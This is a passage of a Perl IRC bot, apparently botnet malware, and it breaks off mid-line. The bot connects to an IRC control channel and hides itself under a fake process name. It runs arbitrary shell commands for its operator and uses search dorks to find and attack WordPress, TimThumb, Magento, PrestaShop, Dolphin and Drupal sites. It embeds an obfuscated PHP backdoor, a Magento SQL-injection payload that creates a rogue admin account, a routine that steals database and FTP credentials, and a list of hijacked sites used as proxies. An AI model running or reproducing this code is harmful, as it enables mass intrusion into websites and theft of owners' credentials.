#!/usr/bin/perl use HTTP::Request; use HTTP::Request::Common; use HTTP::Request::Common qw(POST); use HTTP::Cookies; use LWP; use LWP::Simple; use LWP::UserAgent; use Socket; use IO::Socket; use IO::Socket::INET; use IO::Select; use MIME::Base64; use URI::Escape; use Digest::MD5 qw(md5_hex); #use DBI; my $datetime = localtime; my $fakeproc = "/usr/sbin/rev"; my $ircserver = "irc.merantau.org"; my $ircport = 6669; my $number = int(rand(99)); my $nickname = "Sofya"; my $ident = "saya"; my $channel = "#scans"; my $admin = "free"; my $fullname = "1,1".&rainbow("[Sofya]$number"); my $lobeProxy = "http://94.23.53.54:2112"; my $kuex = 0; my $revlogo = "[+]Revslider <=>"; my $timlogo = "[!]TimThumB <=>"; my $maglogo = "[+]MaG <=>"; my $sqllogo = "[!]SqL <=>"; my $whlogo = "[!]WHmCS <=>"; my $prestalogo = "[!]PrestaShop <=>"; my $dolphinlogo = "[!]DolPhiN <=>"; my $testilogo = "[!]TesTi <=>"; my $mmfclogo = "[+]MmFc <=>"; my $lfilogo = "[+]LFI <=>"; my $dzlogo = "[#]DZ <=>"; my $drulogo = "1,1".&rainbow("[=]Drupal <=>"); my $revcmd = "!re".$number; my $timcmd = "!tim".$number; my $timcmd2 = "!timx".$number; my $magcmd = "!mg".$number; my $magscmd = "!mag".$number; my $sqlcmd = "!sql".$number; my $whcmd = "!ws".$number; my $prestacmd = "!pre".$number; my $presta2cmd = "!pres".$number; my $dolphincmd = "!dol".$number; my $testicmd = "!testi".$number; my $mmfccmd = "!mmfc".$number; my $lficmd = "!lfi".$number; my $dzcmd = "!dz".$number; my $magjscmd = "!magjs".$number; my $drucmd = "!drup".$number; my $bekdur = "drups.php"; my $payload = 'echo "PD9waHANCiRjPWd6aW5mbGF0ZShzdHJfcm90MTMoYmFzZTY0X2RlY29kZSgiclVwNll0cFZFUDdjVmZrUDAzb3FneTVnSjdtcktnZlM5Z2k1VWRlRUhwQzdEMVp5R1h1QmVubXZ0VjZYMEtqLy9YTnBlZ0o5V3F1aUJ1eHNmZWJaMmRrdGorWVNPcDNPWEtmSjlra25FZGtOS0o1bjJlaG5NQnozTHNkajFodGNNSmdyUHUyeXVkYTU3N3FMeGFMOWdTdXA1VE5DaTVRWDdWV203aVNSTTJxUnR5S1pkcDUydDh3VEdjYUZ1Ky90SGJqZXZqdmxWNFZYdEtKREZTMjBsUzJlUVJLZXR0L2xNMm1FeVF1OVdUam9jczY3V2ZOYjdWTlNiaFNQVzYzdHJXbkJzeGp1cGhpOU5RMUdrU3g5WUQxTUtzRVZYUEFGMjRYcWVoZEZtY2tpRHlOK09KRXE1c3JQY2NZUHdmZ1c0Z1AzOTU3bnQ0Y3dDYU9ibVpKeUZpUG9VU3IveVluNVI1YVRCUFgrVVNieHgrMnRKNi9ESlVwN1k3ZTk5U2lYaGRCUGMzNDRLWEZGZDM2SXdvUkN0Yi92YkJnWTM3VE0vUVA3dUJDeG52dlBlTTJjaTlsYys4OE9LdldIbHNodmZ1dnYwVmdhcXBuSVRlUU5CMExYSk1vNFNMTHFjdDh6WWhPcHRWbDlDRmd0MXp4MzhWTVlBN0lTU05TQW5vc01zQTRSd3hQUGUvYXMxeVB0T3MvZnB4a2Q1SHV1cG9sY3JJQjhwRFdqSmJXa1RJWXBoZWV0cFV0TE9vQjF0a0d0RnEyNWVGenhDWjhuTWw2U0xCYnZUc1JkYzVlQ0hXZ215djdwRUJzSkRORmR0dWRzUWhuWTZyck1vdzRDNkhWeWZ1a3BQaktSd2xITXNpNkxzRXE1YnhBbGJrUm5tVkpac1hZdkhJMmhENi9nSFBiaGFqaUZBVnpDRUZQNGZRRi80OThBL3NQdmpuaDZPeTZHeFdKWllFVzZKaWYrRURwR0NYTC9Ga2VJYTVJUW95S2JhTmwraFgwZHZjVy92Vkw3RmVsdFRnbGU1UE44ZXd0cWwwZUI0cmxIR3QwYlhoUDFid3FOeDZJb3VHSHNCS1ArZFdjMnVMaGxKdUc3OE1aczIzayt3b1haYkMrd215UGNCUnE2NEtIVHpvSkM4SkVjaHYvMmgwcnNaengrRTV3T1UzRDJsdFFpZTdlaEh2Yi91ZXlQeHNIbDhNd2EwRzJoQlF2akVKWnVOZ1AwNEpHRzY0eFBrejhqc3lLYzh0U0xPWnErRkprSWM0alNJVzZReXBnN0svd3J3eWJjN1JROHd1N1RXQXcvYldqU0Q4NEh4MzBNTURnNWJvZllQRHdwK0Rlc0x0RElwT1lxVk1veDQxd1diYkxNd3BRM1NSVTU5amRyYUh3OFVacXFtdm1ObGdxRGZNMTIyRDhmalB0NFFYWW9rb1p3ZUpjcTQ0dVhNeExSc0dkcGdSbWEyQzQ3RFF1UndKKzBKbTRHMVlpdGlVL0s2azJ1czdNM01PSUs5eG5SWWxpNHpnQ2xkRWdPRk5kQW1ZSDkyWnBLV0h6UDFIUVd2LzF6S0JMVFU5MDNmL1hIU2tHVTRBaWxucUdXS1dNQ1VYeTlDWnhFWW12MmN4eWNuTDN1WDd3Njd6dW1FVzllZFFIZGU2dmpUdS95dkg4eERvYUR3ZGhzMjNObllJZ3NWMWMwcGVkUHBHekMyOWpSMUNLS1c0NTZ2bDJ3QVp1MmdGL1lQLzZEK3NlMy9ZTlRaM1d5amhZYTkyZzlJVzA0RFk3eGJJZ2IzaWgxTWtRUmxUVmFPNkREcDdzUGN4WnBuenczSHpROGIrMUl5amJEYkxKbDNrNXVReFkwSGhxc2pSVUdLRUJOdEJFMm1ucldmSFdPV0dmQUdsZWFvQlFwWGVJalUwdWxkVE9ZM1N0MG55clhiajBvSDYwZEpuRzBtazUyU2JLNUdYTk5jeEVkcEpBdk1Ca2RFenZSSXJaN0xDS1Jlc1Nkc2x0MXBmRFllcEIrMTJRZDA0ZFQ5WmhuQ2MrTXF0bmFJNFhpdWtjWmtLU054dlhDM3EzSldwTks4aStsdUw3K2tSeDEvZlVrU0NLaXpFN0tSd29walJCeCtnM05Sd2dOQjEyMmFhQjlrOWllV2RNUTcwOCtHQzVTbHBkdDdkckVnS2pHZ3kyTjJhWnBSMEZGWksrM2JoaThENVBTdk4rZ3ZWZ0FqNXpERmVCN1ZRaWM0MjJaUTNhWmRaR0hWeHY3U1J6cXNDNmtybzZLKzBFbGwrYUtDQ2NpNFdnMUxqbDV3SjZMT09aTUJicXdKWGtZV2NuZHFxbEc2WlZJS1o4L2tFVzgyRURWcmw5T1RzeE45NzAvcW5FNDBlbWh2anJvWThQQklxMnZGUk85NHRrV3ZVNzEyckFsMXE0YzYxeVBXM3VUamdYTi9meCtXenplTVRoM253b09PdDBaaFJuUE5JOVVTa0hOaS9NVzdZeVJkczBVTDNxQmpjN2pnQXdhWDJmUmRoNUxONXpCS3pSNms2WUM4MWhQUkxWcHROU2RnZWNsajNaSGZBUTdtbTVRUHlxamlCY0ZkUlMxUHcySDg4dy9CbWtJSDgwRy9Jemtkd1BVTE9OK01aUkl5alEyZEVzMTZXWEYxMXZvb0dFaHozeGpmaGRtdkxvRi9KWlVEWXB4QnAxNklwZDgyY2EwMlR4TTAzc0lzc0pqci9oTUNQS0hNS2gyRFU1YUVRQXRTV0FPRy90L3VRTFBucmFMLy9COUtuT2xDbmFqbTBhNlRBTlJ6L1dMQmZ3RWR5Y3BvSldFemtxQXZ6ajZIdz09IikpKTsNCmV2YWwoJGMpOw0KPz4="| base64 -d | tee '.$bekdur; my $timot = 10; my $injector = "http://wordpress.com.djcaa.org/bad.php"; my $injector2 = "https://wordpress.com.djcaa.org/bad.php"; my $botx = "http://wordpress.com.djcaa.org/botx.txt"; my $thumbid = uri_escape($injector); my $thumbid2 = uri_escape($injector2); my $md5tim = md5_hex($injector); my $md5tim2 = md5_hex($injector2); my @bugxxx = ("/timthumb.php", "/includes/timthumb.php", "/includes/timthumb-released.php", "/framework/scripts/timthumb.php", "/framework/scripts/timthumb-released.php", "/thumb.php", "/img.php", "/scripts/timthumb.php", "/lib/scripts/timthumb.php", "/lib/scripts/timthumb-released.php", "/functions/timthumb.php", "/functions/timthumb-released.php", "/timthumb-released.php", "/scripts/timthumb-released.php"); my @bugpresta = ('/modules/columnadverts/uploadimage.php','/modules/homepageadvertise/uploadimage.php','/modules/productpageadverts/uploadimage.php','/modules/simpleslideshow/uploadimage.php','/modules/columnadverts2/uploadimage.php','/modules/realty/include/uploadimage.php','/modules/realty/evogallery/uploadimage.php','/modules/soopamobile/uploadimage.php','/modules/homepageadvertise/uploadimage.php','/modules/filesupload/upload.php','/module/resaleform/upload.php','/modules/megaproduct/'); my @bugxx = ("xmlrpc.php","/xmlrpc.php","adxmlrpc.php","phpgroupware/xmlrpc.php","/faq/xmlrpc.php","/b2/xmlsrv/xmlrpc.php","/nucleus/xmlrpc/server.php","/xmlsrv/xmlrpc.php","/nucleus/xmlrpc/server.php","/faq/xmlrpc.php","phpgroupware/xmlrpc.php"); my $uagent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; sv-SE; rv:1.7.5) Gecko/20041108 Firefox/1.0"; my @tabele = ('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario', 'name','names','nombre','nombres','usuarios','member','members','admin_table','miembro','miembros','membername','admins','administrator', 'administrators','passwd','password','passwords','pass','Pass','tAdmin','tadmin','user_password','user_passwords','user_name','user_names', 'member_password','mods','mod','moderators','moderator','user_email','user_emails','user_mail','user_mails','mail','emails','email','address', 'e-mail','emailaddress','correo','correos','phpbb_users','log','logins','login','registers','register','usr','usrs','ps','pw','un','u_name','u_pass', 'tpassword','tPassword','u_password','nick','nicks','manager','managers','administrador','tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id', 'sistema_usuario','sistema_password','contrasena','auth','key','senha','tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member', 'tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization','membros','utilizadores','staff','nuke_authors','accounts','account','accnts', 'associated','accnt','customers','customer','membres','administrateur','utilisateur','tuser','tusers','utilisateurs','password','amministratore','god','God','authors', 'asociado','asociados','autores','membername','autor','autores','Users','Admin','Members','Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO'); my @kolumny = ('admin_name','cla_adm','usu_adm','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email', 'user_name','username','name','user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','mail', 'usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','nombre','login_id','usr','sistema_id','author', 'sistema_usuario','auth','key','membername','nme','unme','psw','password','user_password','autores','pass_hash','hash','pass','correo', 'userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','authors', 'user_pwd','u_pass','clave','usuario','contrasena','pas','sistema_password','autor','upassword','web_password','web_username'); my $jpath = "?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q="; sub lobex { my @lobex = ("http://www.pece.com.my/2014/wp-content/themes/Avada/framework/error.php", "http://www.ares-asesores.com/ares/wp-content/languages/error.php", "http://member.marketingbodz.com/error.php", "http://collarme.org/dolphin/error.php", "http://www.ts-private.com/error.php", "http://www.whitecoatinteractive.com/error.php", "http://ledfootn.tmdhosting410.com/error.php", "http://pddm.org/community/error.php", "http://yogurtpos.com/wp-content/themes/error.php", "http://kontento.eu/wp-content/themes/smartbox-theme/error.php", "http://arpwegenwaterbouw.nl/wp-content/themes/smartbox-theme/error.php", "http://vatnedekkservice.no/wp-includes/js/thickbox/class-mail.php", ); my $jackx = $lobex[rand(scalar(@lobex))]; return $jackx.$jpath; } my $jack1 = &lobex; my $jack2 = &lobex; my $jack3 = &lobex; my $jack4 = &lobex; my $jack5 = &lobex; my $jack6 = &lobex; my $jack7 = &lobex; my $jack8 = &lobex; my $jack9 = &lobex; my $jack10 = &lobex; my $jack11 = &lobex; my $jack12 = &lobex; my $jack13 = &lobex; my $jack14 = &lobex; my $jack15 = &lobex; my $jack16 = &lobex; my $jack17 = &lobex; my $jack18 = &lobex; my $engine = "google|net|com|org|info|edu|biz|pro|name|cat|mobi|asia|coop|tel|mil|travel|museum|gov|life|AC|AD|AE|AF|AG|AI|AL|AM|AN|AO|AQ|AR|AS|AT|AU|AW|AX|AZ|BA|BB|BD|BE|BF|BG|BH|BI|BJ|BM|BN|BO|BQ|BR|BS|BT|BV|BW|BY|BZ|CA|CC|CD|CF|CG|CH|CI|CK|CL|CM|CN|CO|CR|CU|CV|CW|CX|CY|CZ|DE|DJ|DK|DM|DO|DZ|EC|EE|EG|EH|ER|ES|ET|EU|FI|FJ|FK|FM|FO|FR|GA|GB|GD|GE|GF|GG|GH|GI|GL|GM|GN|GP|GQ|GR|GS|GT|GU|GW|GY|HK|HM|HN|HR|HT|HU|ID|IE|IL|IM|IN|IO|IQ|IR|IS|IT|JE|JM|JO|JP|KE|KG|KH|KI|KM|KN|KP|KR|KW|KY|KZ|LA|LB|LC|LI|LK|LR|LS|LT|LU|LV|LY|MA|MC|MD|ME|MG|MH|MK|ML|MM|MN|MO|MP|MQ|MR|MS|MT|MU|MV|MW|MX|MY|MZ|NA|NC|NE|NF|NG|NI|NL|NO|NP|NR|NU|NZ|OM|PA|PE|PF|PG|PH|PK|PL|PM|PN|PR|PS|PT|PW|PY|QA|RE|RO|RS|RU|RW|SA|SB|SC|SD|SE|SG|SH|SI|SJ|SK|SL|SM|SN|SO|SR|SS|ST|SU|SV|SX|SY|SZ|TC|TD|TF|TG|TH|TJ|TK|TL|TM|TN|TO|TP|TR|TT|TV|TW|TZ|UA|UG|UK|US|UY|UZ|VA|VC|VE|VG|VI|VN|VU|WF|WS|YE|YT|ZA|ZM|ZW"; $SIG{'INT'} = 'IGNORE'; $SIG{'HUP'} = 'IGNORE'; $SIG{'TERM'} = 'IGNORE'; $SIG{'CHLD'} = 'IGNORE'; $SIG{'PS'} = 'IGNORE'; $ircserver = "$ARGV[0]" if $ARGV[0]; $ircport = "$ARGV[1]" if $ARGV[1]; $nickname = "$ARGV[2]" if $ARGV[2]; $channel = '#'."$ARGV[3]" if $ARGV[3]; $0 = "$fakeproc"."\0" x 16; my $pid = fork; exit if $pid; die "\n[!] Something Wrong !!!: $!\n\n" unless defined($pid); our %irc_servers; our %DCC; my $dcc_sel = new IO::Select->new(); $sel_client = IO::Select->new(); sub sendraw { if ($#_ == '1') { my $socket = $_[0]; print $socket "$_[1]\n"; } else { print $IRC_cur_socket "$_[0]\n"; } } sub connector { my $mynick = $_[0]; my $ircserver_con = $_[1]; my $ircport_con = $_[2]; my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1); if (defined($IRC_socket)) { $IRC_cur_socket = $IRC_socket; $IRC_socket->autoflush(1); $sel_client->add($IRC_socket); $irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con"; $irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con"; $irc_servers{$IRC_cur_socket}{'nick'} = $mynick; $irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost; nick("$mynick"); sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$fullname"); sleep(1);}} sub parse { my $servarg = shift; if ($servarg =~ /^PING \:(.*)/) { sendraw("PONG :$1"); } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) { if (lc($1) eq lc($mynick)) { $mynick = $4; $irc_servers{$IRC_cur_socket}{'nick'} = $mynick; } } elsif ($servarg =~ m/^\:(.+?)\s+433/i) { nick($mynick.int(rand(5))); } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) { $mynick = $2; $irc_servers{$IRC_cur_socket}{'nick'} = $mynick; $irc_servers{$IRC_cur_socket}{'nome'} = "$1"; sendraw("MODE $mynick +i"); sendraw("MODE $mynick +Bx"); # sendraw("NS id qwe123"); sendraw("JOIN $channel correct"); sendraw("PRIVMSG $channel :1,1".&rainbow($number)); sendraw("PRIVMSG $admin :Hi $admin im here !!!"); } } my $line_temp; while( 1 ) { while (!(keys(%irc_servers))) { connector("$nickname", "$ircserver", "$ircport"); } select(undef, undef, undef, 0.01); delete($irc_servers{''}) if (defined($irc_servers{''})); my @ready = $sel_client->can_read(0); next unless(@ready); foreach $fh (@ready) { $IRC_cur_socket = $fh; $mynick = $irc_servers{$IRC_cur_socket}{'nick'}; $nread = sysread($fh, $ircmsg, 4096); if ($nread == 0) { $sel_client->remove($fh); $fh->close; delete($irc_servers{$fh}); } @lines = split (/\n/, $ircmsg); $ircmsg =~ s/\r\n$//; if ($ircmsg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) { my ($nick,$ident,$host,$path,$msg) = ($1,$2,$3,$4,$5); if ($path eq $mynick) { if ($msg =~ /^PING (.*)/) { sendraw("NOTICE $nick :PING $1"); } if ($msg =~ /^VERSION/) { sendraw("NOTICE $nick :VERSION mIRC v6.21 Khaled Mardam-Bey"); } if ($msg =~ /^TIME/) { sendraw("NOTICE $nick :TIME ".$datetime.""); } if (&isAdmin($nick) && $msg eq "!die") { &shell("$path","kill -9 $$"); } if (&isAdmin($nick) && $msg eq "!killall") { &shell("$path","killall -9 perl"); } if (&isAdmin($nick) && $msg eq "!reset") { sendraw("QUIT :Restarting..."); } if (&isAdmin($nick) && $msg =~ /^!joinx \#(.+)/) { sendraw("JOIN #".$1); } if (&isAdmin($nick) && $msg =~ /^!partx \#(.+)/) { sendraw("PART #".$1); } if (&isAdmin($nick) && $msg =~ /^!nick (.+)/) { sendraw("NICK ".$1); } if (&isAdmin($nick) && $msg =~ /^!pid/) { sendraw($IRC_cur_socket, "PRIVMSG $nick :Fake Process/PID : $fakeproc - $$"); } if (&isAdmin($nick) && $msg !~ /^!/) { &shell("$nick","$msg"); } if (&isAdmin($nick) && $msg =~ /^!raw (.+)/) { sendraw("$rawmsg $msgraw ".$1); } if (&isAdmin($nick) && $msg =~ /^!say (.+)/) { sendraw("PRIVMSG $rawmsg ".$1); } if (&isAdmin($nick) && $msg =~ /^!act (.+)/) { sendraw("PRIVMSG $rawmsg :ACTION ".$1.""); } if (&isAdmin($nick) && $msg =~ /^!timot\s+(.*) -d/) { $newtimot = $1; $timot = $newtimot; &msg("$admin","9,1 Get Content TimeOut change to4 $timot "); } if (&isAdmin($nick) && $msg =~ /^!chxchan\s+(.+) -d/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { $newchan = $1; $chanxxx = $newchan; &msg("$admin","9,1 xChan change to4 $chanxxx "); }}} } else { if (&isAdmin($nick) && $msg eq "!die") { &shell("$path","kill -9 $$"); } if (&isAdmin($nick) && $msg eq "!killall") { &shell("$path","killall -9 perl"); } if (&isAdmin($nick) && $msg eq "!reset") { sendraw("QUIT :Restarting..."); } if (&isAdmin($nick) && $msg =~ /^!joinx \#(.+)/) { sendraw("JOIN #".$1); } if (&isAdmin($nick) && $msg eq "!partx") { sendraw("PART $path"); } if (&isAdmin($nick) && $msg =~ /^!partx \#(.+)/) { sendraw("PART #".$1); } if (&isAdmin($nick) && $msg =~ /^\.sh (.*)/) { &shell("$path","$1"); } if (&isAdmin($nick) && $msg =~ /^$mynick (.*)/) { &shell("$path","$1"); } if (&isAdmin($nick) && $msg =~ /^!pid/) { &msg("$nick","6Fake Process/PID : $fakeproc - $$"); } if ($msg=~ /^!id/) { $injectx = ""; my $cekx = &get_content($injector); if ($cekx =~ /GIF89a/i){ $injectx = "Ready!!!"; } else { $injectx = "Lost!!!"; } &msg("$path","1,1".&rainbow("Timthumb Injector : $injectx" )); } if ($msg=~ /^!cek\s+(.*)/){ $dork = $1; &belikukis; my $hasilcek = &search_engine_query("http://www.google.com/search?q=".uri_escape($dork)."&tbm=isch"); # print $hasilcek; my $hasil = ""; if ($hasilcek =~ /HTTP\/1.1 429/) { $hasil = "8,1 Proxy 4Error !?!?! "; } if ($hasilcek =~ /HTTP\/1.1 200/) { $hasil = "8,1 Try 4To 9Scan !?!?! "; } if ($hasilcek=~ /Location: (.*?)\s+/) { print "Banned\n$1\n\n"; &msg($admin,"$1"); $hasil = "8,1 $dork 9<4=9> 4Banned "; } if ($hasilcek =~ /style=\"padding-top:.33em\">/) { $hasil = "8,1 $dork 13Bad Dork "; } if ($hasilcek =~ /id=\"resultStats\">(.+?)11 $1 "; } if ($hasil eq "") { &msg($path,"4,1 Something Error "); } else { &msg($path,$hasil); } } if($msg=~ /^!mag\s+(.*)/) { my $target = $1; $target =~ s/http//; my $postdata = 'filter=cG9wdWxhcml0eVtmcm9tXT0wJnBvcHVsYXJpdHlbdG9dPTMmcG9wdWxhcml0eVtmaWVsZF9leHByXT0wKTsNClNFVCBAU0FMVCA9ICdycCc7DQpTRVQgQFBBU1MgPSBDT05DQVQoTUQ1KENPTkNBVCggQFNBTFQgLCAnYm90MTIzJykgKSwgQ09OQ0FUKCc6JywgQFNBTFQgKSk7DQpTRUxFQ1QgQEVYVFJBIDo9IE1BWChleHRyYSkgRlJPTSBhZG1pbl91c2VyIFdIRVJFIGV4dHJhIElTIE5PVCBOVUxMOw0KSU5TRVJUIElOVE8gYGFkbWluX3VzZXJgIChgZmlyc3RuYW1lYCwgYGxhc3RuYW1lYCxgZW1haWxgLGB1c2VybmFtZWAsYHBhc3N3b3JkYCxgY3JlYXRlZGAsYGxvZ251bWAsYHJlbG9hZF9hY2xfZmxhZ2AsYGlzX2FjdGl2ZWAsYGV4dHJhYCxgcnBfdG9rZW5gLGBycF90b2tlbl9jcmVhdGVkX2F0YCkgVkFMVUVTICgnRmlyc3RuYW1lJywnTGFzdG5hbWUnLCdlbWFpbEBleGFtcGxlLmNvbScsJ2JvdHh4eCcsQFBBU1MsTk9XKCksMCwwLDEsQEVYVFJBLE5VTEwsIE5PVygpKTsNCklOU0VSVCBJTlRPIGBhZG1pbl9yb2xlYCAocGFyZW50X2lkLHRyZWVfbGV2ZWwsc29ydF9vcmRlcixyb2xlX3R5cGUsdXNlcl9pZCxyb2xlX25hbWUpIFZBTFVFUyAoMSwyLDAsJ1UnLChTRUxFQ1QgdXNlcl9pZCBGUk9NIGFkbWluX3VzZXIgV0hFUkUgdXNlcm5hbWUgPSAnYm90eHh4JyksJ0ZpcnN0bmFtZScpOw==%3D&___directive=e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ&forwarded=1'; my $ceklogin = 'form_key=3ryAIBlm7bJ3naj9&login%5Busername%5D=botxxx&login%5Bpassword%5D=bot123'; my $tes = &magx($target,$postdata); if ($tes =~ /200 OK/) { my $cekadm = &magxx($target,$ceklogin); if ($cekadm =~ /302 Moved/) { &msg($path,"9,1 Sukses 8-> 15 http$target/admin 4[15botxxx4:15bot1234] "); } elsif ($cekadm =~ /302 Found/) { &msg($path,"9,1 Sukses 8-> 15 http$target/admin 4[15botxxx4:15bot1234] "); } else { &msg($path,"4,1Failed !!!"); } } else { &msg($path,"4,1Failed, Not Vulnerable !!!"); } } ##################################################################### SCAN if ($msg =~ /^$revcmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("/wp-admin/admin-ajax.php",$1); my $check = &read_dorks($dork); if ($check == 1) { &msg("$path","1,1".&rainbow("$nick Re-scan detected")); exit; } else { &msg("$path","1,1".&rainbow("$revlogo Search Engine Loading ...")); &write_dorks($dork); &se_start($path,$bug,$dork,$engine,1); } } } } if ($msg =~ /^$timcmd\s+(.*)/) { my $dork = $1; &msg("$path","1,1".&rainbow("$timlogo SearCHinG $dork...")); &se_start($path,"",$dork,$engine,2); } if ($msg =~ /^$magcmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("/app/etc/local.xml",$1); &msg("$path","1,1".&rainbow("$maglogo Search Engine Loaded..")); &se_start($path,$bug,$dork,$engine,3); } } } if ($msg =~ /^$whcmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("zzz",$1); my $check = &read_dorks($dork); if ($check == 1) { &msg("$path","1,1".&rainbow("$nick Re-scan detected")); exit; } else { &msg("$path","1,1".&rainbow("$whlogo Search Engine Loading ...")); &write_dorks($dork); &se_start($path,$bug,$dork,$engine,4); } } } } if ($msg =~ /^$sqlcmd\s+(.+?)\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ($1,$2); my $check = &read_dorks($dork); if ($check == 1) { &msg("$path","1,1".&rainbow("$nick Re-scan detected")); exit; } else { &msg("$path","1,1".&rainbow("$sqllogo Search Engine Loading ...")); &write_dorks($dork); &se_start($path,$bug,$dork,$engine,5); } } } } if ($msg =~ /^$prestacmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("",$1); my $check = &read_dorks($dork); if ($check == 1) { &msg("$path","1,1".&rainbow("$nick Re-scan detected")); exit; } else { &msg("$path","1,1".&rainbow("$prestalogo Search Engine Loading ...")); &write_dorks($dork); &se_start($path,$bug,$dork,$engine,6); } } } } if ($msg =~ /^$presta2cmd\s+(.+?)\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ($1,$2); my $check = &read_dorks($dork); if ($check == 1) { &msg("$path","1,1".&rainbow("$nick Re-scan detected")); exit; } else { &msg("$path","1,1".&rainbow("$prestalogo Search Engine Loading ...")); &write_dorks($dork); &se_start($path,$bug,$dork,$engine,7); } } } } if ($msg =~ /^$dolphincmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("administration/modules.php",$1); my $check = &read_dorks($dork); if ($check == 1) { &msg("$path","1,1".&rainbow("$nick Re-scan detected")); exit; } else { &msg("$path","1,1".&rainbow("$dolphinlogo Search Engine Loading ...")); &write_dorks($dork); &se_start($path,$bug,$dork,$engine,8); } } } } if ($msg =~ /^!dolcmd\s+(.+?)\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($target,$cmdxx) = ($1,$2); my $cetak = &dol_query($target,$cmdxx); &msg("$path","1,1".&rainbow("$dolphinlogo $target =>")."15 $cetak "); } } } if ($msg =~ /^!dolbd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $target = $1; my $cetak = &dol_query2($target); &msg("$path","1,1".&rainbow("$dolphinlogo cek-> ").$target." "); } } } if ($msg =~ /^!dolftp\s+(.*)/) { my $target = $1; my $host = $target; $host =~ s/http:\/\///; $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $user = &dol_query($target,"include('../inc/header.inc.php'); echo \$db['user'];"); if ($user =~ /_/) { @userz = split(/_/,$user); $user = $userz[0]; } my $pass = &dol_query($target,"include('../inc/header.inc.php'); echo \$db['passwd'];"); &msg("$path","1,1".&rainbow("$dolphinlogo FTP <=> Checking $host | $user : $pass ")); &ftp_connect($host,$user,$pass,$path,$dolphinlogo,1); } } } if ($msg =~ /^$testicmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("modules/blocktestimonial/addtestimonial.php",$1); &msg("$path","1,1".&rainbow("$testilogo Search Engine Loading ...")); &se_start($path,$bug,$dork,$engine,9); } } } if ($msg =~ /^$mmfccmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("wp-content/plugins/mm-forms-community/includes/doajaxfileupload.php",$1); &msg("$path","1,1".&rainbow("$mmfclogo Search Engine Loading ...")); &se_start($path,$bug,$dork,$engine,10); } } } if ($msg =~ /^$lficmd\s+(.+?)\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ($1,$2); &msg("$path","1,1".&rainbow("$lfilogo Search Engine Loading ...")); &se_start($path,$bug,$dork,$engine,11); } } } if ($msg =~ /^$timcmd2\s+(.+?)\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ($1,$2); &msg("$path","1,1".&rainbow("$timlogo Search Engine Loading ...")); &se_start($path,$bug,$dork,$engine,12); } } } if ($msg =~ /^$dzcmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("wp-content/plugins/dzs-videogallery/admin/upload.php",$1); &msg("$path","1,1".&rainbow("$dzlogo Search Engine Loading ...")); &se_start($path,$bug,$dork,$engine,13); } } } if ($msg =~ /^$magjscmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("js/webforms/upload/",$1); &msg("$path","1,1".&rainbow("$maglogo Search Engine Loading ...")); &se_start($path,$bug,$dork,$engine,14); } } } if ($msg =~ /^$drucmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $dork = $1; &msg("$path","1,1$drulogo ".&rainbow("Search Engine Loading ...")); &se_start($path,"",$dork,$engine,21); } } } if ($msg =~ /^$magscmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $dork = $1; &msg("$path","1,1".&rainbow("$maglogo Search Engine Loading ...")); &se_start($path,"",$dork,$engine,89); } } } if ($msg =~ 